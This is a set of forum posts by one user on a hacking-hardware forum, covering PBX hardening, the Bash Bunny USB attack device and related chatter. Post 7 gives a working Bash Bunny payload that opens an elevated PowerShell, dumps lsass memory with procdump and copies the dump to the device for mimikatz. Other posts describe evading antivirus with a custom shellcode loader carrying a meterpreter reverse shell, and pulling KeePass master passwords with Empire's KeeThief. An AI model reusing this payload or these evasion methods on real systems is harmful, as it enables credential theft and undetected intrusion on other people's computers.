rottingsun's Achievements


Newbie (1/14)

  1. There are a few basic strategies, some hardware based and some software based. Normally a special type of firewall called a session border controller is placed in front of the PBX. They're designed to address issues like toll fraud. Other things can be done too though. General PBX hardening best practices should be enforced, like strong SIP account passwords, limiting SIP sessions to only your authorized private subnets, not allowing outgoing international calling, not allowing outgoing calling to offshore US territories, turning off call transfer feature codes for incoming calls, not exposing your PBX directly to a public IP, etc. On top of that, you must monitor logs regularly. Here's a presentation that's FreePBX based but includes general best practices. https://player.vimeo.com/video/130328541
  2. With mimikatz and all the derivatives being flagged more and more these days, I find it more effective to take a memdump of lsass using procdump, then run it through mimi in minidump mode.
  3. So I ended up having a major issue with a VMware host at work and missed the live. Anyone care to share their impressions of the PS?
  4. Just a few more hours until the new eagles land.
  5. Any further details on the device and what it is capable of, or do we have to wait until tomorrow?
  6. Oughta be interesting. I'll be watching the live stream intently. This blog refers to it as a "programmable MITM device". https://www.doyler.net/security-not-included/def-con-25-bsideslv-2017 I also saw someone on Twitter describe it as "an online tap with payload capability, like the bash bunny".
  7. Here's my working code for running an executable (procdump) from the bunny within powershell and then saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object.

     LED Y 100
     source bunny_helpers.sh
     LED B 100
     ATTACKMODE HID STORAGE
     Q GUI r
     Q DELAY 500
     Q STRING powershell Start-Process powershell -Verb runAs
     Q ENTER
     Q DELAY 1000
     Q ALT y
     Q DELAY 500
     Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
     Q DELAY 500
     Q ENTER
     Q DELAY 500
     Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp
     Q ENTER
     Q DELAY 200
     Q STRING \$driveEject\=New-Object -comObject Shell.Application
     Q ENTER
     Q DELAY 200
     Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\)
     Q ENTER
     Q DELAY 200
     Q STRING exit
     Q ENTER
     LED FINISH

  8. Perhaps LLMNR, NETBIOS, and WPAD are all disabled on the target? Far fetched if it's a home PC, I know, but.
  9. Nice. I got mine in recently. My first payload was running procdump from the bunny and then saving the dump file onto the bunny for later mimikatz analysis.
  10. A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_ga_nai meterpreter rev_tcp payload to successfully bypass both.
  11. The latest Empire stagers actually have a bunny target.
  12. Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
  13. I believe RDP locks the session of the currently logged in user, which would be a dead giveaway. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
  14. KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext.
  15. I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.